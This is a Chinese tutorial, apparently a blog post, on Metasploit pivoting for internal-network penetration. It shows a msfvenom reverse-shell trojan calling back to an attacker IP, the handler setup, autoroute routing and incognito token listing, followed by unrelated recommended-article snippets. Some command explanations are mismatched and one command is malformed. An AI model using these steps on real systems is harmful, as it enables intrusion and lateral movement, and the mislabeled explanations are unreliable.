kali扫描内网ip_Metasploit路由转发实现内网渗透
利用背景
在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。
现在假设的场景是此时我们已经拿下一台内网服务器的远程桌面环境,在进行内网渗透时,发现内网有大量存MS17-010的漏洞主机,如果我们想拿下这些主机,可能就要使用NSA工具箱,但是此工具箱的使用相当的麻烦,这里提供一个思路,我们可以利用“沦陷主机”作为跳板,来实现使用MSF框架直接对内网主机的直接渗透。MSF框架为我们提供了一个很好功能跳板功能模块,此模块可以为我们添加一条转发路由去往内网。
利用过程
攻击机ip:192.168.1.106 监听端口:1234
靶机ip:192.168.1.108
1. 在攻击端生成一个木马文件
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106LPORT=1234 -f exe -o payload.exe
2.msf下使用反弹连接
root@kali:~# msfconsole
msf > use exploit/multi/handler
3.设置反弹需要的payload
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
4.查看配置选项
msf exploit(multi/handler)> show options
5.设置反弹回来自己的主机IP和端口
msf exploit(multi/handler)> set LHOST 192.168.1.106
msf exploit(multi/handler)> set LPORT 1234
6.目标主机打开木马程序文件payload.exe,得到反弹shell
msf exploit(multi/handler)> run
MSF跳板功能
MSF的跳板功能,是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往“内网”的路由,直接使用msf去访问原本不能直接访问的内网资源,只要路由可达了那么我们使用msf的强大功能,为所欲为了。
获取目标内网相关信息
run get_local_subnets
–>获取被攻击目标内网地址网段
run autoroute -s 192.168.1.0/24
–>扫描有效网卡的整个C段的信息
run autoroute -p
–>查看域环境
use incognito
–>调用劫持域管理模块
list_tokens -u
–>查看当前目标主机的域环境信息
添加去往目标网段的转发路由
run autoroute –s <目标内网地址网段>
查看路由添加情况
run autoroute -p
将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。
kali扫描内网ip_Metasploit路由转发实现内网渗透相关推荐
- ip_forward与路由转发
简介 IP地址分为公有ip地址和私有ip地址,Public Address是由INIC(internet network information center)负责的,这些IP地址分配给了注册并向IN ...
- Windows10设置路由同时访问内外网
Windows10设置路由同时访问内外网 首先是获得内网和外网的网关 内网: 外网: 如果这里上面的网关没有显示出来,表明网络注册存在问题,CMD尝试下面命令,然后通过断开重连得方法刷新网络设置 ro ...
- CentOS 7 下用 firewall-cmd / iptables 实现 NAT 转发供内网服务器联网
自从用 HAProxy 对服务器做了负载均衡以后,感觉后端服务器真的没必要再配置并占用公网IP资源. 而且由于托管服务器的公网 IP 资源是固定的,想上 Keepalived 的话,需要挤出来 3 个 ...
- OpenWrt路由开启DDNS+端口转发进行外网访问
OpenWrt路由开启DDNS+端口转发进行外网访问(LuCI界面实现) --开篇 一.准备工作 二.开机! 三.连接 --结尾 –开篇 本篇适用于一切装有OpenWrt系统的路由器/软路由,只要你保 ...
- kali教你路由转发
# 思想 主要使用了arp欺骗,使得用户上网先通过你的kali,之后通过kali转发给对应的网关# 其他应用 既然我们kali,处于中间人,那么用户所操作的所有数据,我们都可以获取到,这里你们可以自由 ...
- 内网穿透+nginx转发
内网穿透加nginx转发实现本地服务远程访问 前言 一.关于内网穿透 介绍 内网穿透常用工具 二.安装nginx(docker方式) 拉取镜像并启动 创建文件挂载目录(老规矩了) 重新创建并启动ngi ...
- Linux 利用 IP转发使内网连接到公网
一.项目背景描述 实际运维工作中,很多机器是不带公网的,一般一个集群或一个平台只有前端能访问互联网,划属于DMZ区域,而内网机器一些因安全所进行的升级,如果采用手动离线升级的话,效率低,而且比如内核升 ...
- Linux下实现Firewalld Net 外网端口转发至内网
前提条件: 公网服务器至少需要2个网卡,一个配公网一个配内网. 内网服务器网卡配置同公网服务器相同内网段内网地址 如果安装过iptables的机器,需要先停止,然后设置开机禁用: servcie ip ...
- 配置软路由-同时连接内网和外网
配置软路由-同时连接内网和外网 Date Created: Mar 23, 2021 9:00 AM Status: 要学习的 windows 环境 首先使用cmd命令中route print检查 网 ...
最新文章
- 修改Kali Linux终端历史记录大小
- 头条一面竟然问我Maven?
- 淘宝代码和html区别,taobao.html
- 【Flink】Flink 报错 Writing records to streamload failed
- Silverlight 4.0 Accordion 解决ScrollViewer 的问题
- 25个超有用的 AngularJS Web 开发工具
- C++ 构造函数中抛出异常
- visual c++ build tools下载地址
- 概率论————思维导图(上岸必备)(数字特征)
- Papers Read for FAULT REPARE_codestorm_新浪博客
- DID; PSM; DID-PSM
- 香港 “一卡通”業務收費表
- maven profile <filtering>true</filtering>的作用
- 08-02-loggin-模块
- 联想M490 开机U盘启动 快捷键
- 浅谈面试与简历——总结于尚硅谷视频《程序员面试指南》
- 把Android手机变成远程监控摄像头
- 历届NBA总决赛结果
- venn diagram_Venn Diagram Python软件包:Vennfig
- mpeg2-ts格式解析
热门文章
- VIO-slam 系统构建
- python自动登录教程_Python 实现自动登录+点击+滑动验证功能
- c语言经典算法大全pdf,c语言经典算法100例pdf版.pdf
- 像Excel一样使用python进行数据分析(1)
- git保护--git分支创建
- %hd %d %ld %u ......
- 用jquery阻止事件起泡
- 使用selector改变按钮状态
- DOMContentLoaded与interactive
- linux安装ffmpeg版本太多,Linux安装FFmpeg的方法